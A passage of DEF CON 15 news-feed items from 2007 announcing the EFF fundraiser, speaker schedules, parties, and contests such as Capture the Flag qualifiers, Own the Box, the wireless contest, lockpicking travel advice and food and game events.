https://www.defcon.org/defconrss.xml This year the Dunk Tank raised $4,700. We matched that and added our contribution to reach a total of $12,000 to the EFF! We know they will put it to good use with their hard work! For the past 17 years, EFF has been proud to take on the hard cases to ensure that your liberty is not sacrificed unnecessarily. They are responsible for loads of support for Tor, stopping RIAA lawsuits, privacy issues, etc. You don't have to wait till the next Dunk Tank at DEFCON 16 to support them! Join EFF today! They work all year round, so support them by donating to EFF at http://secure.eff.org/. Spread the word to your friends and family. Short goal list of current EFF Projects: Pull Congress Back Into the Wiretapping Fight! Repeal the REAL ID Act! Reform the PATRIOT Act! Support the FAIR USE Act! Fight the Justice Department's Copycrime Stop the SPY Act! Stop the Broadcasting Treaty Flip-Flop! CA Alert - Keep RFIDs out of State IDs! Don't Let Congress Shackle Digital Music! Tell Congress to Support E-Voting Reform! make sure every counts! Improve the Freedom of Information Act! Don't Let Cable Companies Ratchet Up Restrictions!

==> theSummit at DEF CON 15

https://www.defcon.org/defconrss.xml Want to help support the EFF and Hacker Foundation? Would you like to meet with authors of those security books you have been reading all year long? Craving some live nerdcore? Kill three birds with one stone! Thursday August 2, 2007 @ 9:00PM Vegas 2.0 presents "theSummit", a fund raiser with a twist! Meet with computer security gurus, listen to some great live music AND support two great causes at the same time! Meet up with us in the Riv Skyboxes this Thursday; tickets are $35 at the door. Need more details? Visit http://www.vegassummit.org

==> DEFCON 15 FINAL Schedule now on-line!

https://www.defcon.org/defconrss.xml We are proud to present the FINAL schedule of speakers and events for DEFCON 15! This year DEFCON has grown, and is offering the largest lineup of speakers ever - thanks to all the new space available at our new venue, the Riviera Hotel. Because of this there are also more contests. There is an overwhelming number of things to participate in. Pending natural disasters, emergencies, or missing, kidnapped or canceled speakers, this is our final schedule... well, that's the intention anyway! If you are speaking or involved in the content side of things and you see a problem or something missing, please let us know! See you at the show!

==> (beta) DEFCON 14 Black and White Video and Audio released!

https://www.defcon.org/defconrss.xml The video and audio from DEFCON 14 have been encoded and are ready for download! There may be some minor tweaks, but all the video that is available has been encoded to iPod Video specs, H.264 and 320x240. Audio is in .mp3 192k format. We are trying to identify the artists in each hour, so if you know who they are please let us know and we'll update the file names so everyone gets proper credit. The following links will have to get you by until the complete RSS feed with iTunes and MRSS tags is complete: http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Carthsis-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Regenerator-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Jackalope-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Mind-Pop-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Minibosses-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-2-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-3-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-4-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-5-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-6-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-7-320-517kbps.mp4

==> Black and White Ball Lineup Announced!

https://www.defcon.org/defconrss.xml The Black and White Ball is back in effect with the following bands and DJs ready to throw down. Friday Night: Black Ball. Industrial / EBM / Noize. Dress: your best blacks; Bondage, Rubber and Fetish encouraged. Featuring: Regenerator http://www.regenerator.net/ DJs Patrice Wintamute SailorGloom Great Scott! Catharsis Kriz Klink And more ... Saturday Night: White Ball ==Geekdom Release party== Dress: your finest stormtrooper suit, togas, bedsheets and the like. Featuring: Miss DJ Jackalope // Jungle Chaos http://www.dj-jackalope.com/ DualCore // Live Nerdcore Set http://dualcoremusic.com *Minibosses // NES classics http://www.minibosses.com/ DJs Rustcycle // Electronic live mix http://www.rustcycle.com Crashish // DNB Casey // psytrance Mitch Mitchem // breakbeat/electroclash * scheduling tentative. All acts subject to change. Please see the complete listing posted throughout DEFCON venues.

==> Amateur Radio at DEFCON 15

https://www.defcon.org/defconrss.xml For all you radio geeks! 146.58 (FM Simplex) will be the unofficial Defcon 15 frequency for Amateur Radio enthusiasts.

==> Sushicon 4.0

https://www.defcon.org/defconrss.xml Wednesday, August 1st at the Sushi Factory on Tropicana will be the time and place for SushiCon 4.0, right before DEFCON. Love sushi? Want to meet new people and hang out in a sake-fueled pre-con ritual? Then SushiCon is for you! Organized by GonMinusOne; check out the forums for the latest details. https://forum.defcon.org/showthread.php?t=8578

==> World Premiere of Infest Wisely to be shown at DEFCON

https://www.defcon.org/defconrss.xml This year's DEFCON Movie Night will feature the new and highly buzz-worthy film "Infest Wisely." The film is centered around the increasingly less science-fictional world of commercial nanotechnology and it's been described this way: "Infest Wisely asks what would happen if Critical Mass teamed up with the geeks from DEFCON to stop commercialized nanotech from taking over our bodies and the world." It's a feature-length movie in seven episodes, each with different directors but all written by novelist Jim Munroe, who will be our special guest for the screening. As always, there's no charge - come join us and support cinema licensed under the Creative Commons. For more information about the film, you can check out its website. http://www.infestwisely.com/

==> DEFCON 15 Schedule now on-line!

https://www.defcon.org/defconrss.xml We are proud to present the schedule of speakers and events for DEFCON 15! This year DEF CON has grown, and is offering the largest lineup of speakers ever - thanks to all the new space available at our new venue, the Riviera Hotel. Because of this there are also more contests. There is an overwhelming number of things to participate in. Please note that this is the first schedule version and is not final. As speakers and contests finalize their information the schedule will be updated up to the last minute. If you're speaking or involved in the content side of things and you see a problem or something missing, please let us know!

==> New ToxicBBQ Contests!

https://www.defcon.org/defconrss.xml From Deviant: "There are two contests/events that I'll be running at this year's ToxicBBQ, both of which involve the "Exotic Meat" theme that I tend to focus upon year after year. I have a web page up online with full details, rules, info, etc... http://deviating.net/toxicbbq" -=[ Titanium Chef ]=- Cost to Participate: $40 per team Prizes for Winners: OiNK invite for each team member, secret grand prize, refund of entry fee, extreme bragging rights and Free giveaways of fun stuff to all participants DefCon Forums Sign-up Thread: https://forum.defcon.org/showthread.php?t=8367 Teams of up to three individuals will put their heads together and engage in heated battle to concoct a delicious dining experience focused around a secret theme ingredient. These hacker chefs will have both their culinary skills and their organizational abilities put to the test in this challenging event. All participants will gather together a few hours before the Toxic BBQ in order to witness the revealing of the event's secret ingredient, then they will disperse in order to gather supplies, reach Sunset Park, and prepare their food for the judges. Whose cuisine will reign supreme? Will opponents' grill-fu be stronger than you? Participate and find out! -=[ Guess The Flesh ]=- Cost to Participate: $10 per person Prizes for Winners: OiNK invite for first three people to correctly identify all meats. Free giveaways of fun stuff to all participants DefCon Forums Sign-up Thread : https://forum.defcon.org/showthread.php?t=8365 Have you ever thought to yourself, "Gee, i wish i could dine on the meat of nearly every kind of beast to walk the earth... but I don't own many high-powered firearms, i don't have the money to travel the world, and no government in their right mind would issue me a hunting license?" Well, now your dreams can become a reality. 
For less than the cost of what passes for a movie and popcorn nowadays, you can have a sample platter featuring eight meats that you aren't likely to see at the supermarket. However, instead of just cooking and randomly giving out samples willy-nilly, this year i have something new planned. I intend to prepare morsels of these meats and plate them in a way that they are not immediately identifiable or distinguishable from one another. Those who are eager to try some new flavors -- and those who think their palates are up to the challenge -- can take a whack at identifying these various animals by taste and texture alone.

==> Be Prepared! Update

https://www.defcon.org/defconrss.xml The "Be Prepared" section of the DEFCON 15 site has been updated! Check it out.

==> Las Vegas concerts for Black Hat and DEFCON time frame

https://www.defcon.org/defconrss.xml From IrishMASMS on the DEFCON forums comes this helpful post: Las Vegas concerts for Black Hat & DEFCON time frame. Some out of town folks hit me up asking about concerts around town during this year's Black Hat and DEFCON. I took a quick look on http://pollstar.com/ and http://www.jambase.com/ for what might be interesting. YMMV, though I thought sharing is caring.
Fri 07/27/07 Violent Femmes - Hard Rock Hotel and Casino
Fri 07/27/07 Jonny Lang - House Of Blues
Sat 07/28/07 Tesla - House Of Blues
Sat 07/28/07 Rush - MGM Grand Garden Arena
Wed 08/01/07 John Lee Hooker Jr. - Santa Fe Station Hotel & Casino
Thu 08/02/07 John Lee Hooker Jr. - Boulder Station Hotel & Casino
Fri 08/03/07 Godsmack - The Pearl Concert Theater At Palms
Sat 08/04/07 Buckcherry, Hinder, Papa Roach - The Pearl Concert Theater At Palms
Sun 08/05/07 Against All Authority, Reel Big Fish / Less Than Jake, Streetlight Manifesto - House Of Blues
Mon 08/06/07 "Sounds Of The Underground": Amon Amarth, Chimaira, Every Time I Die, GWAR, Heavy Heavy Low Low, Job For A Cowboy, Necro, Shadows Fall, The Devil Wears Prada, The Number Twelve Looks Like You - House Of Blues
Sat 08/11/07 The Fixx - The Club @ Cannery Casino
As for venues, the Hard Rock sucks. House of Blues is one of the best in town. MGM Grand is ok, but the sound quality in the arena can be bleep in spots. The Pearl is the brand new venue in town, good luck getting tickets. The Station casinos are not bad venues, and I think those are free shows. The Cannery Casino I have never been to, so I can not say - and there is no review posted on www.yelp.com yet for me to reference. HTH!

==> Scavenger Hunt! Advice from the Winners!

https://www.defcon.org/defconrss.xml Free advice courtesy of hackajar with Vegas 2.0: Here's a quick list of things you will need to be fully geared up, if competing. I kinda wish we had something like this three years ago!
1.) Money - we spent ~$500 each year, though some good social engineering could very well fix this
2.) Digital Camera - Judges won't know what you did, without proof!
3.) Video Camera - Sometimes a photo DOESN'T say a thousand words, but motion video does!
4.) Transportation - Sometimes you have to go on recon, we always paid extra to have a car in front of valet for those quick runs
5.) Room at Hotel - Need somewhere to build a 30ft straw or host a geek girl strip off, your best bet is in a local room
6.) Printer - Don't ask me how many points we never got for lack of a stupid printer!
7.) Beer - It's easy to bribe goons and judges with this stuff, if you can find it.
8.) Start Early - Some items and tasks we could only do on Friday, remember things close on Saturday and Sunday, so be wise!
9.) Memorize the phrase "It's for the Scavenger Hunt" - nuff said
I'm sure I'm missing something else in there, please add to my list! -Vegas 2.0 Defcon 14 Scav Hunt Winners

==> DEFCON 15 CFP is now closed!

https://www.defcon.org/defconrss.xml DEFCON 15 CFP is now closed! We are in the process of making our final selections and will start to fill in the online schedule soon! We will notify you of the status of your submission by July 1st. If you have not heard from us by then please email talks[at]defcon[dot]org. If you were not accepted don't be discouraged, we have received many many quality submissions this year but we can't accept them all. As you know we are in the process of expanding to accept more and more talks each year. There is still plenty you can do to get involved, join the forums, read up on our contests, even just take some cool pictures! pics.defcon.org is now live for use. The pics software is integrated with the defcon forums, so if you already have an account there you automatically have an account on https://pics.defcon.org/ Do your Photoshop skilz 0wnzor?! DEFCON Art Contest is currently open! Submit your art by June 25, to be used online and to be included in the DEFCON 15 program. We are looking for a Web Banner, Key Card, T-Shirt, Wallpaper! If you win you could win free admission and cash to be used at the DEFCON Swag booth! https://www.defcon.org/html/defcon-15/dc-15-forms/DC15-Artwork-Contest-Guidelines.pdf

==> New "Be Prepared"- Lock Picking for Sport and Amusement

https://www.defcon.org/defconrss.xml Lock Picking for Sport and Amusement DEFCON is a great place to learn all sorts of new skills - the skill of lockpicking is no exception. This year's Con will again have a "Lockpicking Village" - a fantastic event with all kinds of presentations, practice locks, sample tools and general education. We want everyone who's interested to check it out, but we want you to be careful and safe as well. Be sure to consult your state and local laws about possession of locksmith's tools. Staying in compliance with the applicable laws is, of course, your responsibility. When traveling, it's not a good idea to put tools of this nature in your carryon. While they're unlikely to cause any problems in checked baggage, those pointy little devils are very likely to be a problem in the security line. It probably ought to go without saying, but if you're making an international trip to DefCon, the scrutiny is much higher and you owe it to yourself to be thoroughly familiar with the rules and err on the side of caution. You don't need that kind of hassle. There's plenty of lockpicking knowledge and fun to be had even without your k-rad tools, so don't put yourself in a position to miss your flight. It's also an option to mail them to yourself in care of your hotel. Some hotels charge for this service, so be aware of the policies wherever you're staying. If the world of locksport is brand new to you and you're looking to get a little knowledge before the Con, you can check out Marc Weber Tobias' contributions to techblog Engadget (called The Lockdown.) More info is also available from Locksport International (lsi.com) or The Open Organization of Lockpickers ( toool.us or toool.nl for Dutch speakers) Link: https://www.defcon.org/html/defcon-15/dc-15-beprepared.html

==> Hackers on A Plane!

https://www.defcon.org/defconrss.xml Hey Hey! If you haven't seen it yet check out Hackers on a Plane! 2007 is a very special year for the global hacker community. Thanks to cooperation between the organizers of DefCon XV and the Chaos Communications Camp 2007, the two largest gatherings of hackers from around the world happen only a few days apart! This is where "Hackers on a Plane" comes in: The Hacker Foundation has put together a complete travel package to help bring together hackers from around the world for ten days of fun, culture and community. We see it as the first step to building a truly global hacker community. $1,337.00 (for those travelling roundtrip from the US & Canada) 1,337.00 (for those travelling roundtrip from Europe) Gets you: * Admission to DefCon in Las Vegas, NV, USA * Flight from Las Vegas to Frankfurt * Flight on the "Hackers on a Plane" charter flight from Frankfurt to Finow Airport * Admission to all days of CCCamp2007 * Accommodation at Camp Anaconda (no need to bring a tent!) * Return flight to select destinations in the USA (or flight to Las Vegas for DefCon for EU citizens.) More info at Hackers on a Plane! Link: http://hackersonaplane.info/info.html

==> LosT @ Con Mystery Box Challenge - Official Registration Open!

https://www.defcon.org/defconrss.xml mysterychallenge.org Official registration is open. To Register Teams must send an email to: Defcon15MysteryChallenge ]at[ mysterychallenge [dot] org -Teams are limited to 5 official members -You must receive a confirmation that your team is registered or you are NOT -You must submit a team name and list team members -Teams successful in completing the challenge last year are guaranteed a spot if registered by June 17. -New teams are encouraged to enter, however only those serious about completing the challenge -The challenge will take longer to complete this year Questions? Post here. Comments? Post here. New teams trying to decide if you have what it takes to compete? Post here (I encourage those who competed last year to answer these types of questions...) Link: https://forum.defcon.org/showthread.php?t=8509

==> NEW CONTEST! 0wn the box? Own the box!

https://www.defcon.org/defconrss.xml From ownthebox.cipherpunx.org/: Are you a defensive ninja? Are your services unbreakable, your builds airtight? Do your countermeasures have countermeasures for counter-countermeasures? So prove it, bucko... Bet your box on it, on the most hostile network in the world. Bring your laptop/server/desktop, hardened to the nines, running exactly two (2) visible services, to our specs, and we'll offer you up for the slaughter. The first person to compromise you walks away with your gear. When you're 0wned, you're owned. It's that simple. The last box(en) standing, unowned, wins, and the winner(s) can take his/her precious back home, safe in the knowledge that if it survived at DC, it can survive anywhere. For the other side of the fence, the reward is clear... Pick your target, 0wn the box, and own the box. A shopping spree for the elite. Link: https://forum.defcon.org/forumdisplay.php?f=337 Contest Site: http://ownthebox.cipherpunx.org/ Be sure to check the forums often it looks like they have already started to collect an interesting list of hardware up for the slaughter! Mwahahaha!

==> Announcing The DefCon 15 Wireless Contest

https://www.defcon.org/defconrss.xml Announcing The DefCon 15 Wireless Contest (cue Thus Spake Zarathustra) Are you a freq-geek? Think your WiFiFu is hot? Get high from sniffing packets on the ether? Think you're a great lover? We can't help you with the last one, but get ready because here's your chance to prove the rest of those outlandish claims to the world. Compete in the Wireless Contest, and we can validate your self-esteem, at least in the geeky stuff. The Wireless Contest, following the format for the past few years, will be a series of "Mini-Contests". You can compete in only a single mini-contest or all of them. We recommend that teams be formed to fill in different skill areas. We are allowing an unlimited number of Teams -subject to resources- limited to 3 people each. First Place winners of individual mini-contest events get prizes, and a top prize will be awarded for the best overall of the contests. A common problem with the Wireless Contest in the last few years is that some potential competitors felt that they didn't have the skills to even try. As a result, fewer competitors kept signing up. To alleviate this, the Wireless contest this year is tied in heavily with the Wireless Village. If you want to compete in the contest, but feel you don't have a needed skill, you can come to the Wireless Village before a mini-contest and learn the needed skill at one of the Wireless Village's world-famous Breakout Sessions. You walk in having no skills but a willingness to learn, learn a skill in an exciting breakout session taught by an expert, then go out and compete and beat the pants off those loudmouth teams who said they'd pwn you. Learn + Touch = DO! link: https://forum.defcon.org/forumdisplay.php?f=309

==> CTF Qualifications Are Complete!

https://www.defcon.org/defconrss.xml From invisigoth: The qualification round for this year's CTF is complete. More than 150 teams were actually submitting answers which means that participation for this year was more than double the previous high water mark (as far as we're aware). Results may be found at http://www.kenshoto.com/ as always. This year's challenges came in a wide range of technologies and difficulties. No single team actually solved them all... Additionally, this year's level of international participation was staggering... The MUD for this year will remain up for teams to ask questions and hopefully collaborate with each other about how they came to solutions for some of the harder challenges. Additionally, we will be putting most if not all of the challenges back online for a while so everybody can sharpen up... Stay tuned...

==> DEFCON 15 Network Team has two slots left!

https://www.defcon.org/defconrss.xml From the site defconnetworking.org: "DefCon presents a really unique opportunity. You know how hostile the environment is. Have you ever wondered what that traffic looks like? All you need do is ask. For years we've provided people the ability to plug in a capture/sniffer box and capture public con traffic to take back to your Evil Laboratory(tm) for analysis after con (you know, once you've sobered up & stuff). If you want in on the action, email us so we can RSVP a spot for you on our Table-of-Doom in the NOC." TWO SLOTS LEFT! To get an idea, check out last year's network: Here are the PPT slides from DC14 Closing Ceremonies with all the net stats: DC14network.ppt http://www.defconnetworking.org/dc14network.ppt Remember, if you're planning anything "special", have specific needs for your talk, for your demo, for your break-out session, let us know EARLY so we can plan for it. About Defcon Networking: We're the group of volunteers who run the network at DEFCON. It's our job to design, plan, architect, implement, and secure the show network. We arrange bandwidth, we handle wireless, we provide secure connections for show staff, speakers, and press. Finally, we provide an environment where DefCon Attendees can share and be creative.

==> DEFCON 15 Speakers Selected!

https://www.defcon.org/defconrss.xml New speakers have been selected for DEFCON 15! Check out their abstracts and bios online now. The Schedule is not yet finished and we still have room for a few more talks! So don't get discouraged, submit your rootfu now! Speaker page: http://www.defcon.org/html/defcon-15/dc-15-speakers.html New Speakers selected: Squidly1, aka Theresa Verity, Thinking Outside the Console (box) Brendan O'Connor, Greater than 1:Defeating "strong" Authentication in Web Applications. Kenneth Geers, Greetz from Room 101 Peter Berghammer (pf0t0n), A Journalist's Perspective on Security Research. Schuyler Towne, Locksport: An Emerging Subculture Many more are online, check back often, the DEFCON 15 Schedule will be online shortly!

==> DEFCON 15 CFP Closing soon

https://www.defcon.org/defconrss.xml The DEFCON 15 CFP will be Closing June 15th! Please submit your rootfu to talks@defcon.org. We have been making selections and we are pleased to have accepted some really great speakers. There is still room to squeeze in a few more exceptional talks. Submit now, there will be no extensions possible! Submit: https://www.defcon.org/html/defcon-15/dc-15-cfp.html New for DEFCON 15: The second year being at the Riviera has allowed us to make some changes to the format from last year. We have more speaking rooms, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! If you have an IDEA please submit it, talks@defcon.org!

==> Amateur CTF Registration now OPEN!

https://www.defcon.org/defconrss.xml Registration for this year's aCTF is officially open! Registration page: http://www.dc949.org/aCTFIII/register.php From Contest Organizers: "We're recommending that you group yourselves in teams of three, as the prizes will come in triplicate. There will be prizes for win, place and show. We have some really good stuff in the works in terms of prizes, but I'm not going to mention them here since they're not bought and in our hands (and/or built)" For a little more information about the setup this year: http://www.dc949.org/aCTFIII/README.php

==> Announcing Official DC949 aCTF Artwork Contest!

https://www.defcon.org/defconrss.xml Official DC949 aCTF Artwork Contest The winner's artwork will be made into an 8x4 foot vinyl sign. Besides bragging rights, the winner will also receive a yet to be determined prize. Rules 1. The contest will remain open for a minimum of 1 week, and will remain open until a winner is chosen. 2. Submissions must have a 2x1 or 1x2 ratio with a minimum resolution of 2000x1000 pixels. 3. Artwork must contain simplistic designs and colors, i.e. designs with definitive edges and no fading or merging colors. 4. Maximum number of colors that can be used is 4. 5. Artwork must contain "DC949" and "aCTF" in some legible form. Submissions must contain a .PNG, .JPG, or .GIF of the artwork as well as in a vector format. (.PSD, .EPS, etc) Please email submissions to cp-at-dc949-dot-org Forums discussion is here: https://forum.defcon.org/showthread.php?t=8456 Don't forget to use your talents to enter into the DEFCON 15 Artwork Contest too! DEFCON 15 Artwork Contest Guidelines http://www.defcon.org/html/defcon-15/dc-15-forms/DC15-Artwork-Contest-Guidelines.pdf Submission deadline: All submissions must be received by June 25, 2007. Submit all entries to: sleestak\at\defcon dot org Categories: Web Banner Key Card T-shirt Wallpaper Banner Art Prize: - The first place winner will receive free admission to DEFCON 15 for one person (non-transferable to a future con), $50 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. T-Shirt Art Prize: Free admission to DEFCON 15 for two persons, $130 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. Wallpaper Art Prize: Free admission to the conference for one person, $50 credit that may be used at the official DEFCON SWAG Store

==> DEFCON 15 Network Team in Effect!

https://www.defcon.org/defconrss.xml As DC 15 gets closer all goon teams are powering up! Ever wonder what the network team is up to? Ever wanted to sniff the con traffic feed? Check out defconnetworking.org! Lockheed throws down some defcon history and gets us ready for more! From the site: DC15 Network 15MAY07 DefCon presents a really unique opportunity. You know how hostile the environment is. Have you ever wondered what that traffic looks like? All you need do is ask. For years we've provided people the ability to plug in a capture/sniffer box and capture public con traffic to take back to your Evil Laboratory(tm) for analysis after con (you know, once you've sobered up & stuff). If you want in on the action, email us so we can RSVP a spot for you on our Table-of-Doom in the NOC. 11MAY07 Why yes, we are in the midst of planning for DC15. Now that we've "done the dance" with the hotel (who are awesome folks, btw!) we know what we can and can't do and should have virtually no surprises this year. We're planning higher bandwidth, better monitoring, and also some new interactive-type stuff (I hesitate speaking of it for fear of jinxing it!). We're actually spending our funds boosting up our own infrastructure (beyond the Aruba kit we have) so we have more ports, better fibre connectivity, better trunking. Remember, if you're planning anything "special", have specific needs for your talk, for your demo, for your break-out session, let us know EARLY so we can plan for it. --Lock

==> Announcing Amateur CtF 3 by DCG 949!

https://www.defcon.org/defconrss.xml From the official web site for the Amateur CtF: aCTF 3 "King of the Hill" Yes, it's official; we'll be back again this year. The first year, nobody scored, the wifi network we set up had massive problems, but people seemed to have a little fun and see the potential. Last year, the network was stable, people scored, battled back and forth, and we were actually able to give out some prizes. There was some trouble with boxes staying up, but overall it was a huge success. Last year we saw some things that surprised us. There was a case of two teams which both could take a flag, but neither could lock the other out. They both then proceeded to write scripts to play the game for them. Yeah, it then made the server inaccessible due to the massive amounts of requests, but still... hats off to both of you. We didn't expect automated hacking. We also learned that while Windows NT might have worked in our little test environment, it really can't hold up to the brutality of a Defcon contest. I'm happy to say that Windows NT will not be appearing in this year's contest. We will be changing a few things around this year, but the basics will be the same as before. Find a flag, find a way to put your team name on it, and you'll score points for as long as you can keep your flag up there. As usual, details on the contest will be limited, however we will say that we're branching out a bit more this year. Hacking isn't just about buffer overflows and running metasploit, it's really about one upping someone (or everyone) else. It's about figuring out how things work and taking them apart and putting them back together to do something different, customizing things to make them do things they were never intended to do, and just generally learning how to beat the system.

==> Announcing DefConBots Contest!

https://www.defcon.org/defconrss.xml Kallahar has updated the software page for the DefConBots Contest. "Improvements over last year include faster response times and software alignment of the camera to where the gun is actually shooting. All the code is public domain, do whatever you want with it!" What is the point of the contest, you ask? Quite simple: it is to create a computer controlled gun that can shoot down targets in a shooting gallery. See http://defconbots.org/ for complete contest information.

==> NEW CONTEST! Guitar Hero II

https://www.defcon.org/defconrss.xml Guitar Hero II Contest!! A new contest at Defcon 15: Are you a Guitar Hero? Do your friends think you're l33t and can shred like a rock star? Then prove it! Contest Site: http://www.panadero.org/gh_home.html Forums discussion: https://forum.defcon.org/forumdisplay.php?f=335 Guitar Hero II - DEFCON STYLE!!!! Why Not!!! Rules (cause they tell us we have to have them...) * The contest will consist of 3 levels of play, Medium, Hard and Expert. * The contest will be played on Guitar Hero II, on the Xbox 360. * An initial pre qualification round will be held so that Experts aren't playing in the Medium level, etc...details of the prequals to come... * All contestants should be at their assigned time to play 10 minutes before their time. There will be some leeway if you are a few minutes late, but don't expect to get your turn if you show up hungover an hour after your time. * You may use your own guitar, as long as it has not been modified, and is for Xbox 360. * Free play is a chance for people that have never played Guitar Hero to have a chance. It's not a chance for contestants to practice. This contest is for everyone, and we want to make sure that is the case. Free play will be limited to one song per person, depending on how many are waiting to play. Scoring * The 'prequals' will be designed to ensure that Experts are not playing in the Medium category, just to win. We want the game to be fair, and everyone to have fun. We would hate for the lesser/newer players to be upset and frustrated because it's dominated by those that have years of practice. * The 'heats' are designed to weed out the newbs from the Guitar Heroes. Each player will play 2 songs, back to back, to come up with a cumulative high score. * The four highest scores will move to the finals for each level. * The finals will be tournament style, head to head, most points win and move to the final song.
* The final two players for each level will play against each other to become the first annual Defcon Guitar Hero champion! * It is VERY important to pick the right songs to get into the finals. Some songs have more notes, for more Star Power and higher points, as some songs have less notes. * All songs in the finals will be chosen by the event coordinators and will not be announced until the start of the finals. Final songs will not be songs included in Xbox Live downloadable content, so that no player has an advantage over others, GOOD LUCK! Defcon STAR POWER!!! Do you want an extra 1000 points added on to your song??? Do ya? Bring me a COLD unopened beer! I won't accept it if it's opened (no date rape drugs for the contest organizers!) Any beer, except for Guinness, you get an extra 1000 points of Star Power! Keep in mind that 6-packs are appreciated, but it will still only get you 1000 points! I love beer, but it's not fair to bring a case of beer and get an extra 12000 points!

==> Toxic BBQ contests and events!!

https://www.defcon.org/defconrss.xml Once again, the Toxic BBQ is looking for a slogan. Something catchy, something creative. It will be used on the front of the Toxic BBQ T-Shirts. Last year was ASTCell's slogan "If its dead we cook it" "If its alive we cook it" " ... a little longer." Submit your ideas. https://forum.defcon.org/showthread.php?p=86581#post86581 Come on, It's not that hard. Toxic BBQ IV Events and Contests: Iron Chef I Time: To Be Announced Contact: Deviant Ollam Event Desc: Contestants in teams of 3 or less will race to cook and present a dish made from an ingredient revealed to them at the start of the contest. After a timed preparation period, the dishes will be awarded points by a panel of judges who will judge for Presentation, Uniqueness, and Flavor! For more info on the Toxic BBQ go here: http://www.toxicbbq.com/ Forums discussion: https://forum.defcon.org/forumdisplay.php?f=308

==> Announcing CoffeeWars VIII: Pre-Con Ranting

https://www.defcon.org/defconrss.xml The Coffee Wars Crew is getting ready for their Call for Beans! From the website: Wake up and smell the coffee war, people: DefCon 15 is just around the corner, and that means another edition of the world's best-known hacker coffee competition. Already, the frenzy has begun! Now's the time when you have an All-Inclusive Divine Excuse to unashamedly mingle with your own kind without having to shroud your activities under the shadow of the Evil Corporate Coffee Empire! Yes, now we caffeine fiends can gather without shame! WHAT? You want a shot of espresso?! We got your shot right here, pal. This event ain't no freebie. If you want a cup, you gotta pony up. Coffee, that is. Whole bean. We're judging it all. The best, the strongest, the most caffeinated. You name it. ...but regular store-bought or corporate coffee trash will only earn a trashing. You think you got what it takes? Then we'll take what you got! Bring your best beans and put 'em up for judgment by our over-qualified, over-caffeinated, (and over-rated) Coffee Wars judges and contestant panel! We keep hearing that someone else's beans are the best. Now it's time to prove it bean-to-bean! Forums discussion is here: https://forum.defcon.org/forumdisplay.php?f=284

==> Announcing LosT @ Con Mystery Box Challenge!

https://www.defcon.org/defconrss.xml The idea is simple.. form a team, get a box, open box. But is it that simple? The box is a mystery, with many puzzles involved in opening it. To get things going for this year Lost Boy has started to accept team sign ups, as well as release clues to hint at some of the puzzles involved. Here is a picture on how NOT to open a mystery box: https://pics.defcon.org/showphoto.php?photo=153 For a bit on the last challenge check CNet's coverage here: http://news.com.com/2300-1029_3-6102806-5.html Interested? Check out the thread on the challenge over on the forums.

==> Capture the Flag Contest Announced!

https://www.defcon.org/defconrss.xml Capture the Flag at DEFCON continues its long tradition with the announcement by Kenshoto of the CtF qualification round! From their announcement: Kenshoto's army of code-gnomes has been working feverishly on the production of this year's installment of WarGamez (CTF), more to come here yet tonight, but we'll be making the quals announcement *very* soon. Check it: Dr. Kenneth Shoto proudly announces that the qualifying round for the Defcon Capture the Flag contest is now open for registration. The qualifying contest will start at 1 June 2007 @ 2200 EST and end 3 June 2007 @ 2200 EST. Teams can be any size you'd like (more ninjas clearly == better) and each team will need to register before 1 June 2007 @ 2200 EST in order to get an account for the actual game. The top 7 teams qualify for a seat at the table at the proverbial 'big show' (the actual CtF competition) to be held at Defcon 15. Defcon takes place August 3-5th 2007 (https://www.defcon.org/) so make sure you clear all those WoW, D&D, and Eve-Online play dates off your calendar early. That's right hackers and hackettes, get your debuggers warmed up and your shellcode tested, cuz it's that time of year again. What you say? You don't know what the bleep we're talking about? Well, peep dis: The core of the qualifying competition will be a quiz-like interface where each team may select a question and then must hack until they can answer it. Topics will vary widely, but of course include such fan-favorites as reversing martian binaries, landing shellcode and a double lutz simultaneously, and stealing information from strange places. We've also thrown in challenges like intar-webs hax0rification and mind-bendy trivia so the 5kr1p+ K1dd1e5 can play along (much love). This year the game allows for maximum parallelization on questions. When the leading team selects a question, that question (and all the ones they already answered) becomes available to the trailing teams.
In other words, there is no need to register multiple ghost accounts as they won't give any advantage (*ahem*skewl*cough)... Don't have the stones to think you can win? Well, you should sign-up and play anyway. The winning team from last year actually got primed up for the game by competing in quals. They then kicked it up a notch by spending the next three months figuring out every detail of every challenge we put out there and explaining it all as if paid to do so (check it out http://nopsr.us/ctf2006prequal/). Besides, how else are you gonna sharpen those skillz and convert yourself from poser to p3wner? So what are you waiting for? Jump onto your nops-sled and slide over to http://kenshoto.allyourboxarebelongto.us:1337/ to sign up for quals now... -kenshoto (ctf07 at kenshoto.com)

==> Announcing the Art Work Contest!

